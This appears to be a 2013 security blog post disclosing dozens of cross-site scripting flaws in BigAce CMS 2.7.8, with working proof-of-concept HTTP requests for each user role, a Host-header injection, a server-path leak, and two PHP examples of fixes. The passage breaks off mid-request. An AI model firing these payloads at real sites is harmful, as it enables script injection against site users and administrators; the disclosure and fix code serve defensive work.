Monday 12 August 2013

[EN] BigAce 2.7.8 Multiple bugs

Last week I saw that Yashar Shahinzadeh had found a vulnerability in the latest version of BigAce CMS.

I decided to check it again, and I found a few other things, described below.

I. For a normal registered ('anonymous') user:


1. Escaping from the page source via the Host header:

---< request >---
GET /bigace/public/index.php?cmd=smarty&id=-1_len HTTP/1.1
Host: 1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaaaaaaa%3c%68%31%3e%61%73%64%3c%2f%68%31%3e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=t02veplpq601tanqc9ugm5sas1
Connection: close
---< request >---

Response:
 <link rel="stylesheet" href="http://1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaaaaaaa%3c%68%31%3e%61%73%64%3c%2f%68%31%3e/bigace/public/cid1/spring_flavour/style.css" type="text
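The response above shows the raw Host header being dropped into the `href` of the stylesheet link, so a `"` in the header closes the attribute and the rest of the value becomes markup. The fix has two halves: never derive generated URLs from a header the client controls, and escape for the attribute context anyway. The following is an added example written for this post, not BigAce's own code; the allowlist of hostnames, the `canonicalHost` and `stylesheetLink` names and the example hostnames are assumptions.

```php
<?php
// Added example (not BigAce code): building the stylesheet URL from a
// configured canonical host instead of the request's Host header.
declare(strict_types=1);

/**
 * Return the host to put in generated URLs. The Host header is attacker
 * controlled, so it is only used when it exactly matches one of the
 * configured hostnames (host[:port], compared case-insensitively);
 * otherwise the first configured host wins.
 */
function canonicalHost(array $allowedHosts, ?string $requestHost): string
{
    $candidate = strtolower(trim($requestHost ?? ''));
    foreach ($allowedHosts as $h) {
        if ($candidate === strtolower($h)) {
            return $h;
        }
    }
    return $allowedHosts[0];
}

/**
 * Build the <link> tag. The host has already been validated, but every
 * dynamic piece is still escaped for the attribute context (ENT_QUOTES so
 * both quote styles are covered), which is the layer that actually stops
 * the breakout shown in the advisory.
 */
function stylesheetLink(array $allowedHosts, ?string $requestHost, string $path): string
{
    $host = canonicalHost($allowedHosts, $requestHost);
    $url  = 'http://' . $host . '/' . ltrim($path, '/');
    return '<link rel="stylesheet" href="'
        . htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '" type="text/css">';
}

// --- constructed input modelled on the request in the advisory ---
$allowed = ['www.example.com'];                         // hypothetical config value
$hostile = '1"/><img/src="x"/onerror="alert(2)">';      // the decoded Host header value
$path    = 'bigace/public/cid1/spring_flavour/style.css';

// Hostile header is rejected: output uses www.example.com.
echo stylesheetLink($allowed, $hostile, $path), PHP_EOL;
// Legitimate header passes through unchanged.
echo stylesheetLink($allowed, 'www.example.com', $path), PHP_EOL;
```

Even if a Host-based check were skipped entirely, the `htmlspecialchars` call alone would have turned the `"` into `&quot;` and kept the value inside the attribute; the allowlist additionally prevents cache-poisoning style tricks where a wrong host ends up in links that are served to other users.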


II. For a logged-in 'editor' user:

1. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D='>"><script>alert(2)</script>&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D='%3e"%3e<script>alert(2)</script>&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='%3e"%3e%3c<script>...&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

4. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


5. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=

---< request >---

6. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


7. xss

---< request >---

POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

8. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

9. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

10. xss

---< request >---

POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---


11. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---


12. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=categoryCreate_tADMIN_len&data[parent]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---

13. xss and dom-based xss
---< request >---
GET /bigace/public/index.php?cmd=application&id=-1_timages_len&browserMode=listing&jsFunc='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---

14. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------60191211818685
Content-Length: 1500

-----------------------------60191211818685
Content-Disposition: form-data; name="mode"

upload
-----------------------------60191211818685
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain

sialala;]
-----------------------------60191211818685
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------60191211818685
Content-Disposition: form-data; name="data[name]"


-----------------------------60191211818685
Content-Disposition: form-data; name="data[unique_name]"


-----------------------------60191211818685
Content-Disposition: form-data; name="data[description]"


-----------------------------60191211818685
Content-Disposition: form-data; name="data[langid]"

"><script>alert(43)</script><
-----------------------------60191211818685
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------60191211818685--
---< request >---


15. xss + information disclosure

---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode="%20body%20onload%3d"alert(4321)"%3e

---< request >---


Response:

<div id="darkBackground">
<form name="" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len" method="POST">
<a href="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len&mode=" body onload="alert(4321)">"><img src="http://10.149.14.52/bigace/public/system/style/standard/refresh.png" border="0" align="top" alt="RELOAD" /></a> <select name="mode" onChange="this.form.submit()">
<option value="index">Statistics Info</option>
<option value="last7">Last Seven Daily Averages</option>
<option value="os">OS Information</option>
<option value="browser">Browser Information</option>
<option value="bots">Search Engines</option>
<option value="visitors">Top Visitors</option>
<option value="references">Top References</option>
<option value="byYear">By Year</option>
<option value="byUrl">By URL</option>
</select>
&nbsp;&nbsp;<noscript><button type="submit">Show</button></noscript></form>
</div>
<h3 class="error">Requested Mode does not exist: " body onload="alert(4321)"><br>/var/www/bigace/system/admin/plugins/includes/statistics/.php</h3><div align="center" class="CopyrightFooter"><span class="copyright">Powered by <a href="http://www.bigace.de/" target="_blank">BIGACE 2.7.8</a>.&nbsp;All rights reserved. <br />&copy; 2002-2013 <a href="http://www.kevinpapst.de/" target="_blank">Kevin Papst</a><br /></span></div>
<!-- $Id: AdminContentFooter.tpl.html,v 1.2 2009/02/28 00:43:33 kpapst Exp $ -->
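Two things go wrong in the response above: the `mode` value is echoed unescaped both into the reload link and into the error heading, and the error heading leaks the server-side include path (`/var/www/bigace/...`), which tells us the value is being used as a file name. The usual fix for a parameter that selects a sub-page is to resolve it against a fixed list of known modes and escape whatever is reflected. Below is an added example for this post, not BigAce's own code; the mode list is taken from the `<select>` in the response, while the function names, the includes directory and the base URL are assumptions.

```php
<?php
// Added example (not BigAce code): resolving a "mode" parameter against a
// fixed list and escaping every reflected value.
declare(strict_types=1);

// The modes offered by the <select> in the advisory's response.
const STATISTIC_MODES = [
    'index', 'last7', 'os', 'browser', 'bots',
    'visitors', 'references', 'byYear', 'byUrl',
];

/** Escape for a text node or a double-quoted HTML attribute. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/**
 * Map the requested mode to a known one. Unknown values fall back to
 * 'index', so the user-supplied string is never used as a path component
 * and the include target is always one of our constants.
 */
function resolveMode(?string $requested): string
{
    if ($requested !== null && in_array($requested, STATISTIC_MODES, true)) {
        return $requested;
    }
    return 'index';
}

/** Path of the file to include; only a constant from STATISTIC_MODES can end up here. */
function modeIncludePath(string $includeDir, ?string $requested): string
{
    return rtrim($includeDir, '/') . '/' . resolveMode($requested) . '.php';
}

/**
 * Render the reload link and, when the mode was unknown, an error line.
 * The bad value is reported escaped, and the message says nothing about
 * where files live on disk.
 */
function renderModeSelector(string $baseUrl, ?string $requested): string
{
    $mode = resolveMode($requested);
    $out  = '<a href="' . h($baseUrl . '&mode=' . rawurlencode($mode)) . '">reload</a>';
    if ($requested !== null && $requested !== $mode) {
        $out .= '<h3 class="error">Requested mode does not exist: ' . h($requested) . '</h3>';
    }
    return $out;
}

// --- constructed input modelled on the advisory's request ---
$base    = 'http://www.example.com/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len'; // hypothetical
$payload = '" body onload="alert(4321)">';

echo renderModeSelector($base, $payload), PHP_EOL;
echo modeIncludePath('/srv/app/includes/statistics', $payload), PHP_EOL; // .../index.php
echo modeIncludePath('/srv/app/includes/statistics', 'os'), PHP_EOL;      // .../os.php
```

Note that the original response also shows what happens with an empty `mode`: the computed file name degenerates to `.php`. With the allowlist approach that case simply resolves to `index` as well, so no `file_exists` check on user input is needed.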


16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)

-----------------------------7318133896418
Content-Disposition: form-data; name="mode"

upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"

"><script>alert(/x/)</script>
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------7318133896418--
---< request >---


17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"

upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"

'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------7318133896418--
---< request >---

18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52

-----------------------------7318133896418
Content-Disposition: form-data; name="mode"

upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"

'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------7318133896418--
---< request >---

19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D=cze%3b]%3c%2fscript%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bcatchwords%5D=asdasd&data%5Bdescription%5D=asdasd
---< request >---

20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=menuAttributes_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=6&data%5Bid%5D=-1&data%5Blangid%5D=en&data%5Bparentid%5D=-9999&data%5Bunique_name%5D=index_en.html&data%5Bname%5D=Home&data%5Bcatchwords%5D=BIGACE+WEB+CMS&data%5Bdescription%5D=Menu+TOP-LEVEL&data%5Btext_4%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0
---< request >---

III. For a logged-in 'designer' user:

1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenu_tADMIN_len&data[id]=-1&adminCharset='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data[langid]=en&mode=changeattrib HTTP/1.1
Host: 10.149.14.52
Connection: close
---< request >---


2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=createNewMenu&data%5BnextAdmin%5D=menuAttributes&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=asd&data%5Bcatchwords%5D=asd&data%5Bdescription%5D=asd&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=PublishingWorkflow&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---

3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=design_tADMIN_len&mode=update&hashtoken=0cbbd0bec2522717655d2458877c750b HTTP/1.1
Host: 10.149.14.52
Content-Length: 214

designName=BIGACE-REDIRECT&description=Redirects+to+the+URL+in+the+Menus+Catchwords.&template=REDIRECT&stylesheet=dummy_stylesheet&portletColumns='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&contents=asd
---< request >---


IV. For a logged-in admin:

1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len&data[id]=-1&data[nextAdmin]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---

Response:

<form name="MenuValues" onSubmit="return checkCreateForm();" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len" method="POST">
<input type="hidden" name="mode" value="createNewMenu">
<input type="hidden" name="data[nextAdmin]" value="'>"><img/src="x"/onerror="alert(4321)">">


2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------309932421512500
Content-Length: 1022

-----------------------------309932421512500
Content-Disposition: form-data; name="mode"

upload
-----------------------------309932421512500
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------309932421512500
Content-Disposition: form-data; name="data[parentid]"

a"><script>alert(1)</script>
-----------------------------309932421512500
Content-Disposition: form-data; name="data[name]"

aaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[unique_name]"

aaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------309932421512500
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------309932421512500--
---< request >---


3. same request, parameter data[name] (xss too)

4. same for parameter: data[unique_name], data[description].


For data[description], to reproduce it you must first close the <textarea> tag, so
the payload should be similar to this one:
</textarea><script>alert(2)</script>

5. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=createNewMenu&data%5BnextAdmin%5D=itemMenu&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=aaaaaaaaaaaa&data%5Bcatchwords%5D=aaaaaaaaaaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaa&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---

6. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------47528326907
Content-Length: 1420

-----------------------------47528326907
Content-Disposition: form-data; name="mode"

upload
-----------------------------47528326907
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain

sialala;]
-----------------------------47528326907
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------47528326907
Content-Disposition: form-data; name="data[name]"


-----------------------------47528326907
Content-Disposition: form-data; name="data[unique_name]"


-----------------------------47528326907
Content-Disposition: form-data; name="data[description]"


-----------------------------47528326907
Content-Disposition: form-data; name="data[langid]"

"><script>alert(3)</script>
-----------------------------47528326907
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------47528326907--
---< request >---

7. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D="><script>alert(9)</script>&data%5Bcatchwords%5D=aaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaaaaaaaaaaaa
---< request >---

8. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len&mode=addToGroup HTTP/1.1
Host: 10.149.14.52

data%5Bid%5D=3&data%5Bgroup%5D=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e
---< request >---


   
9. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


10. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


11. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


12. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

13. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1048

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

"><script>alert(234)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---


14. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

15. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---

17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---


18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------12326531612573
Content-Length: 1039

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

"><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---

19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1045

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
